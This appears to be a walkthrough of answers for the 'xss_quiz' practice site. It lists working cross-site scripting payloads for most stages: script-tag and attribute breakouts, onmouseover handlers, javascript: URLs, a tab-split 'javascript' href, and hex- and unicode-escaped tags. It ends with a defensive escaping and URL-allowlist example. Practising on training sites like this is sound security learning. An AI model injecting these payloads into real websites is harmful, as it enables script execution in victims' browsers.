
xss_quiz


Practice site: xss_quiz


Stage #1

<script>alert(document.domain)</script>


Stage #2

"><script>alert(document.domain)</script>


Stage #3


Stage #4

Stage #5

Use Firebug to delete maxlength="15"

In the text box: "><script>alert(document.domain)</script>


Stage #6

" onmouseover="alert(document.domain);"


Stage #7

" onmouseover=alert(document.domain);


Stage #8

javascript:alert(document.domain);


Stage #9

Hint: UTF-7 XSS

The hint is UTF-7; exploitation did not succeed.


Stage #10

"><script>alert(document.dodomainmain)</script>


Stage #11

"><a href="javascrip&#09;t:alert(document.domain);">foo</a>


Stage #12

``onmouseover=alert(document.domain);

(IE Only)
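
The defences that stop the Stage #2, #6, #8 and #11 answers above, as an added example that is not part of the original post: output escaping for quoted attribute values and a parser-based scheme allowlist for href values. The function names and the BASE origin are assumptions made for illustration.

```javascript
// Added example (not from the original post). Defensive checks exercised
// against the answers listed for Stage #2, #6, #8 and #11.

// Escape the characters that let a value leave an HTML text node or a
// quoted attribute value.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Weak check: a literal prefix blacklist on the raw string.
function naiveHrefCheck(value) {
  return !String(value).toLowerCase().startsWith("javascript:");
}

// Hardened check: let the WHATWG URL parser normalise the value (it drops
// ASCII tab/newline, as browsers do), then allow only http(s).
// BASE is a constructed placeholder origin used to resolve relative links.
const BASE = "https://app.example/";
function isAllowedHref(value) {
  let url;
  try {
    url = new URL(String(value), BASE);
  } catch {
    return false; // unparseable input is rejected
  }
  return url.protocol === "http:" || url.protocol === "https:";
}

// Render a link with a quoted, escaped href; rejected URLs fall back to "#".
function renderLink(href, label) {
  const safeHref = isAllowedHref(href) ? href : "#";
  return `<a href="${escapeHtml(safeHref)}">${escapeHtml(label)}</a>`;
}

// Values taken from the stages above. STAGE11_HREF is the Stage #11 href
// after the HTML parser has decoded &#09; into a tab character.
const STAGE2 = '"><script>alert(document.domain)</script>';
const STAGE6 = '" onmouseover="alert(document.domain);"';
const STAGE8 = "javascript:alert(document.domain);";
const STAGE11_HREF = "javascrip\tt:alert(document.domain);";

console.log(`<input value="${escapeHtml(STAGE2)}">`);
console.log(naiveHrefCheck(STAGE11_HREF), isAllowedHref(STAGE11_HREF));
console.log(renderLink(STAGE11_HREF, "foo"));
```

The Stage #7 answer needs no quote character at all, so the escaping only holds when the attribute value is always emitted inside quotes, as renderLink does.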


Stage #13


Stage #14


Stage #15

Hex-encode '>' and '<'

\\x3Cscript\\x3Ealert(document.domain)\\x3C/script\\x3E


Stage #16

Unicode-encode '>' and '<'

\\u003cscript\\u003ealert(document.domain);\\u003c/script\\u003e


Stage #17

Stage #18

